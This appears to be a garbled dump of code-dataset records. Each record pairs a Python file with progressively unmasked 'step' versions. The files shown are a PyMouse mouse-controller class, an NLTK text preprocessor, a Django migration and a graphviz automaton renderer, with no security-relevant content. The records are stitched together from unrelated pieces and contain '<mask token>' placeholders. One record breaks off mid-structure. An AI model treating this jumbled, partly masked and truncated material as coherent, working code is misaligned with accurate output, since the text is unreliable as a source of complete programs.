from pymouse import PyMouse
m = PyMouse()
w,h = m.screen_size()
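# screen size in pixels; the normalized xy coordinates passed to the methods below are scaled by (w, h)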
class base_controller:
def __init__(self):
pass
def move(self,xy:list):
'''
        Move
'''
m.move(xy[0]*w,xy[1]*h)
def click(self, xy:list):
'''
        Click
'''
m.click(xy[0]*w,xy[1]*h)
def scroll(self, marks:list):
'''
        Scroll
'''
d = marks[0][1] - marks[-1][1]
R = 0.2
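        # dead-zone threshold: vertical travel smaller than this (in normalized screen units) is ignored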
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy:list, ones = True):
'''
        Press and hold
'''
if ones:
m.press(xy[0]*w,xy[1]*h)
else:
m.drag(xy[0]*w,xy[1]*h)
def release(self, xy:list):
'''
        Release
'''
m.release(xy[0]*w,xy[1]*h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
|
normal
|
{
"blob_id": "b2f2f1e4b7070ac867b71e538f759e527eb1ffb9",
"index": 416,
"step-1": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n <mask token>\n <mask token>\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-2": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-3": "<mask token>\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-4": "from pymouse import PyMouse\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-5": "from pymouse import PyMouse\nm = PyMouse()\nw,h = m.screen_size()\n\nclass base_controller:\n def __init__(self):\n pass\n\n def move(self,xy:list):\n '''\n 移动\n '''\n m.move(xy[0]*w,xy[1]*h)\n \n def click(self, xy:list):\n '''\n 点击\n '''\n m.click(xy[0]*w,xy[1]*h)\n \n def scroll(self, marks:list):\n '''\n 滚动\n '''\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy:list, ones = True):\n '''\n 长按\n '''\n if ones:\n m.press(xy[0]*w,xy[1]*h)\n else:\n m.drag(xy[0]*w,xy[1]*h)\n\n def release(self, xy:list):\n '''\n 松开\n '''\n m.release(xy[0]*w,xy[1]*h)\n\n\nclass mac_controller(base_controller):\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Preprocessor(object):
<|reserved_special_token_0|>
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
<|reserved_special_token_0|>
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
def __init__(self, max_workers=4):
self.max_workers = max_workers
self.tokenizer = RegexpTokenizer('\\w+')
self.en_stopwords = set(get_stop_words('en'))
self.p_stemmer = PorterStemmer()
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
def process_docs_with_urls(self, urldoc_list):
return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
<|reserved_special_token_1|>
from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
def __init__(self, max_workers=4):
self.max_workers = max_workers
self.tokenizer = RegexpTokenizer(r"\w+")
self.en_stopwords = set(get_stop_words("en"))
self.p_stemmer = PorterStemmer()
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
def process_docs_with_urls(self, urldoc_list):
return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
|
flexible
|
{
"blob_id": "8cd50e1f0e0feb4d753443220f9fa9065e80e0ef",
"index": 6358,
"step-1": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-2": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n <mask token>\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-3": "<mask token>\n\n\nclass Preprocessor(object):\n <mask token>\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n return url, self.preprocess_doc(content)\n <mask token>\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-4": "from concurrent.futures import ProcessPoolExecutor\nfrom nltk import PorterStemmer, RegexpTokenizer\nfrom stop_words import get_stop_words\n\n\nclass Preprocessor(object):\n\n def __init__(self, max_workers=4):\n self.max_workers = max_workers\n self.tokenizer = RegexpTokenizer('\\\\w+')\n self.en_stopwords = set(get_stop_words('en'))\n self.p_stemmer = PorterStemmer()\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n return url, self.preprocess_doc(content)\n\n def process_docs_with_urls(self, urldoc_list):\n return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]\n\n\nclass WithUrlPreprocessor(Preprocessor):\n\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-5": "from concurrent.futures import ProcessPoolExecutor\n\nfrom nltk import PorterStemmer, RegexpTokenizer\nfrom stop_words import get_stop_words\n\n\nclass Preprocessor(object):\n def __init__(self, max_workers=4):\n self.max_workers = max_workers\n self.tokenizer = RegexpTokenizer(r\"\\w+\")\n self.en_stopwords = set(get_stop_words(\"en\"))\n self.p_stemmer = PorterStemmer()\n\n def preprocess_doc(self, doc):\n tokens = self.tokenizer.tokenize(doc.lower())\n\n stopped_tokens = [i for i in tokens if i not in self.en_stopwords]\n\n stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]\n\n return stemmed_tokens\n\n def process_docs(self, doc_list):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n return [self.preprocess_doc(doc) for doc in doc_list]\n\n def preprocess_doc_with_url(self, doc_with_url):\n with ProcessPoolExecutor(max_workers=self.max_workers):\n url, content = doc_with_url\n\n return url, self.preprocess_doc(content)\n\n def process_docs_with_urls(self, urldoc_list):\n return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]\n\n\nclass WithUrlPreprocessor(Preprocessor):\n def __init__(self, max_workers=4):\n super().__init__(max_workers=max_workers)\n\n def preprocess_doc(self, doc):\n _, content = doc\n return super().preprocess_doc(content)\n",
"step-ids": [
4,
6,
7,
10,
11
]
}
|
[
4,
6,
7,
10,
11
] |
# Generated by Django 3.2.4 on 2021-07-18 02:05
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('tracker', '0003_auto_20210626_0735'),
]
operations = [
migrations.CreateModel(
name='Result',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, db_index=True)),
('value', models.TextField(max_length=2000)),
('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),
],
options={
'abstract': False,
},
),
]
|
normal
|
{
"blob_id": "ead843f1edcfe798613effb049e3ca79dcd03b71",
"index": 7919,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('tracker', '0003_auto_20210626_0735')]\n operations = [migrations.CreateModel(name='Result', fields=[('uuid',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False)), ('created_date', models.DateTimeField(\n auto_now_add=True, db_index=True, null=True)), ('modified_date',\n models.DateTimeField(auto_now=True, db_index=True)), ('value',\n models.TextField(max_length=2000)), ('tracker', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker'))\n ], options={'abstract': False})]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('tracker', '0003_auto_20210626_0735')]\n operations = [migrations.CreateModel(name='Result', fields=[('uuid',\n models.UUIDField(default=uuid.uuid4, editable=False, primary_key=\n True, serialize=False)), ('created_date', models.DateTimeField(\n auto_now_add=True, db_index=True, null=True)), ('modified_date',\n models.DateTimeField(auto_now=True, db_index=True)), ('value',\n models.TextField(max_length=2000)), ('tracker', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker'))\n ], options={'abstract': False})]\n",
"step-5": "# Generated by Django 3.2.4 on 2021-07-18 02:05\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('tracker', '0003_auto_20210626_0735'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Result',\n fields=[\n ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),\n ('modified_date', models.DateTimeField(auto_now=True, db_index=True)),\n ('value', models.TextField(max_length=2000)),\n ('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
<|reserved_special_token_0|>
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
def format_labels(self, labels):
return ','.join(labels)
<|reserved_special_token_0|>
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state,
accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state,
accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[from_state, to_state] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format='png', view
=True)
def make_label(self, rule):
return 'ε' if rule._character == None else rule._character
def format_labels(self, labels):
return ','.join(labels)
def get_state(self, rule):
return rule._state
def get_next_state(self, rule):
return rule._next_state
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style='invis', shape='point')
graph.edge(dummy_node, self.state_to_str(start_state), style='bold')
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
if len(state) == 0:
return 'Ø'
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
return str(state)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
import graphviz
import fa_util
class Graph:
def draw(self, directory, filename, rules, start_state, accept_states):
g = graphviz.Digraph(format="svg", graph_attr={'rankdir': 'LR'})
self.add_start_edge(g, start_state)
edges = {}
for rule in rules:
from_state = self.state_to_str(self.get_state(rule))
to_state = self.state_to_str(self.get_next_state(rule))
self.add_graph_node(g, self.get_state(rule), from_state, accept_states)
self.add_graph_node(g, self.get_next_state(rule), to_state, accept_states)
label = self.make_label(rule)
edge_labels = edges.get((from_state, to_state))
if edge_labels == None:
edges[(from_state, to_state)] = [label]
else:
edge_labels.append(label)
self.add_edges(g, edges)
g.render(filename=filename, directory=directory, format="png", view=True)
# Supposed to be extended
def make_label(self, rule):
return "ε" if rule._character == None else rule._character
# Supposed to be extended
def format_labels(self, labels):
return ','.join(labels)
# Supposed to be extended
def get_state(self, rule):
return rule._state
# Supposed to be extended
def get_next_state(self, rule):
return rule._next_state
# Supposed to be extended
def add_start_edge(self, graph, start_state):
dummy_node = fa_util.random_str(8)
graph.node(dummy_node, style="invis", shape="point")
graph.edge(dummy_node, self.state_to_str(start_state), style="bold")
def add_graph_node(self, graph, state, state_str, accept_states):
attr = {'root': 'true', 'shape': 'circle'}
if state in accept_states:
attr['shape'] = 'doublecircle'
graph.node(state_str, **attr)
def add_edges(self, graph, edges):
for (_from, to), labels in edges.items():
graph.edge(_from, to, self.format_labels(labels))
def state_to_str(self, state):
if isinstance(state, str):
return state
try:
iter(state)
### state is iterable ###
if len(state) == 0:
return 'Ø'
# converting list object directly to set object break the order of elements in string
list_str = str([self.state_to_str(e) for e in sorted(state)])
return list_str.replace('[', '{').replace(']', '}')
except TypeError:
### state is not iterable ###
return str(state)
|
flexible
|
{
"blob_id": "c0e94a0d20397ebbbdddf726307b19b6c5c85ae6",
"index": 9082,
"step-1": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n <mask token>\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n <mask token>\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n <mask token>\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
"step-3": "<mask token>\n\n\nclass Graph:\n\n def draw(self, directory, filename, rules, start_state, accept_states):\n g = graphviz.Digraph(format='svg', graph_attr={'rankdir': 'LR'})\n self.add_start_edge(g, start_state)\n edges = {}\n for rule in rules:\n from_state = self.state_to_str(self.get_state(rule))\n to_state = self.state_to_str(self.get_next_state(rule))\n self.add_graph_node(g, self.get_state(rule), from_state,\n accept_states)\n self.add_graph_node(g, self.get_next_state(rule), to_state,\n accept_states)\n label = self.make_label(rule)\n edge_labels = edges.get((from_state, to_state))\n if edge_labels == None:\n edges[from_state, to_state] = [label]\n else:\n edge_labels.append(label)\n self.add_edges(g, edges)\n g.render(filename=filename, directory=directory, format='png', view\n =True)\n\n def make_label(self, rule):\n return 'ε' if rule._character == None else rule._character\n\n def format_labels(self, labels):\n return ','.join(labels)\n <mask token>\n\n def get_next_state(self, rule):\n return rule._next_state\n\n def add_start_edge(self, graph, start_state):\n dummy_node = fa_util.random_str(8)\n graph.node(dummy_node, style='invis', shape='point')\n graph.edge(dummy_node, self.state_to_str(start_state), style='bold')\n\n def add_graph_node(self, graph, state, state_str, accept_states):\n attr = {'root': 'true', 'shape': 'circle'}\n if state in accept_states:\n attr['shape'] = 'doublecircle'\n graph.node(state_str, **attr)\n\n def add_edges(self, graph, edges):\n for (_from, to), labels in edges.items():\n graph.edge(_from, to, self.format_labels(labels))\n\n def state_to_str(self, state):\n if isinstance(state, str):\n return state\n try:\n iter(state)\n if len(state) == 0:\n return 'Ø'\n list_str = str([self.state_to_str(e) for e in sorted(state)])\n return list_str.replace('[', '{').replace(']', '}')\n except TypeError:\n return str(state)\n",
